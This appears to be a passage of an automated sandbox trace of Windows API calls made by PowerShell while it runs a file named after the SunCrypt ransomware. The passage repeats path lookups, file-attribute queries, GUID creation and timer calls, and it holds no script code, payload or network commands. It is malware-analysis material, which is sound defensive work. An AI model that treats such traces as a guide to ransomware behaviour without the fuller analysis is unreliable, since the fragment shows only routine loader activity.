lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.407] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.408] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.408] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.584] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701640311653) returned 1 [0103.587] EtwEventActivityIdControl () returned 0x0 [0103.587] EtwEventActivityIdControl () returned 0x0 [0103.587] EtwEventActivityIdControl () returned 0x0 [0103.587] EtwEventActivityIdControl () returned 0x0 [0103.587] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xccc3bed5, Data2=0x1915, Data3=0x4d6f, Data4=([0]=0x95, [1]=0x71, [2]=0x72, [3]=0xe1, [4]=0x9b, [5]=0x2, [6]=0x7a, [7]=0x74))) returned 0x0 [0103.588] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.588] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701640489245) returned 1 [0103.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.589] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.589] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.589] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.591] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701640724830) returned 1 [0103.591] EtwEventActivityIdControl () returned 0x0 [0103.591] EtwEventActivityIdControl () returned 0x0 [0103.591] EtwEventActivityIdControl () returned 0x0 [0103.591] EtwEventActivityIdControl () returned 0x0 [0103.591] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xe45aac8, Data2=0x78d0, Data3=0x48fa, Data4=([0]=0x8a, [1]=0xb5, [2]=0x36, [3]=0xb9, [4]=0x19, [5]=0x2f, [6]=0xe4, [7]=0x15))) returned 0x0 [0103.592] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.592] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701640887669) returned 1 [0103.592] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.592] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.593] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.593] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.593] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.593] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.595] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701641175221) returned 1 [0103.595] EtwEventActivityIdControl () returned 0x0 [0103.595] EtwEventActivityIdControl () returned 0x0 [0103.595] EtwEventActivityIdControl () returned 0x0 [0103.596] EtwEventActivityIdControl () returned 0x0 [0103.596] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x9bb88c9e, Data2=0x899c, Data3=0x4932, Data4=([0]=0xbe, [1]=0xd1, [2]=0x84, [3]=0x57, [4]=0xd7, [5]=0xee, [6]=0x90, [7]=0x2f))) returned 0x0 [0103.597] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.597] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701641347875) returned 1 [0103.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.597] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.597] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.597] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.608] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701642492086) returned 1 [0103.608] EtwEventActivityIdControl () returned 0x0 [0103.608] EtwEventActivityIdControl () returned 0x0 [0103.609] EtwEventActivityIdControl () returned 0x0 [0103.609] EtwEventActivityIdControl () returned 0x0 [0103.609] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xa0b81641, Data2=0x542, Data3=0x4799, Data4=([0]=0xb4, [1]=0xe8, [2]=0xb6, [3]=0x67, [4]=0x86, [5]=0xa1, [6]=0x1c, [7]=0xe2))) returned 0x0 [0103.610] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.610] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701642645388) returned 1 [0103.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.610] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.616] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701643222546) returned 1 [0103.616] EtwEventActivityIdControl () returned 0x0 [0103.616] EtwEventActivityIdControl () returned 0x0 [0103.616] EtwEventActivityIdControl () returned 0x0 [0103.616] EtwEventActivityIdControl () returned 0x0 [0103.616] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xdf2b7472, Data2=0xe16f, Data3=0x472f, Data4=([0]=0x8f, [1]=0x1f, [2]=0x1b, [3]=0x7b, [4]=0xa2, [5]=0x22, [6]=0xf, [7]=0xac))) returned 0x0 [0103.617] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.617] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701643374855) returned 1 [0103.617] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.617] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.617] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.618] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.618] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.619] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701643604706) returned 1 [0103.620] EtwEventActivityIdControl () returned 0x0 [0103.620] EtwEventActivityIdControl () returned 0x0 [0103.620] EtwEventActivityIdControl () returned 0x0 [0103.620] EtwEventActivityIdControl () returned 0x0 [0103.620] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x1a276eb6, Data2=0xfd13, Data3=0x4950, Data4=([0]=0x8e, [1]=0x95, [2]=0x2b, [3]=0x0, [4]=0x1b, [5]=0xe1, [6]=0xec, [7]=0x17))) returned 0x0 [0103.621] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.621] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701643765667) returned 1 [0103.621] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.621] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.621] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.622] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.622] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.628] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701644451030) returned 1 [0103.628] EtwEventActivityIdControl () returned 0x0 [0103.628] EtwEventActivityIdControl () returned 0x0 [0103.628] EtwEventActivityIdControl () returned 0x0 [0103.641] EtwEventActivityIdControl () returned 0x0 [0103.641] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x80ab7c62, Data2=0x5049, Data3=0x4d93, Data4=([0]=0xa3, [1]=0xd0, [2]=0xc7, [3]=0x56, [4]=0xe, [5]=0x5a, [6]=0x23, [7]=0x0))) returned 0x0 [0103.642] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.642] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701645871740) returned 1 [0103.642] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.642] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.642] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.643] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.643] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.645] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701646212106) returned 1 [0103.646] EtwEventActivityIdControl () returned 0x0 [0103.646] EtwEventActivityIdControl () returned 0x0 [0103.646] EtwEventActivityIdControl () returned 0x0 [0103.646] EtwEventActivityIdControl () returned 0x0 [0103.646] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xbb3fd6c4, Data2=0x57e0, Data3=0x4a7a, Data4=([0]=0xaa, [1]=0xd4, [2]=0x64, [3]=0xf1, [4]=0x0, [5]=0xa1, [6]=0x83, [7]=0x9a))) returned 0x0 [0103.647] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.647] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701646373791) returned 1 [0103.647] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.647] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.647] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.648] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.648] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.650] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701646816100) returned 1 [0103.652] EtwEventActivityIdControl () returned 0x0 [0103.652] EtwEventActivityIdControl () returned 0x0 [0103.652] EtwEventActivityIdControl () returned 0x0 [0103.652] EtwEventActivityIdControl () returned 0x0 [0103.652] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x41aea648, Data2=0x70fc, Data3=0x41c7, Data4=([0]=0xad, [1]=0x44, [2]=0x49, [3]=0xe1, [4]=0xff, [5]=0x71, [6]=0xeb, [7]=0x6))) returned 0x0 [0103.653] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.653] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701646983349) returned 1 [0103.653] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.653] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.654] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.654] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.654] GetFullPathNameW (in: 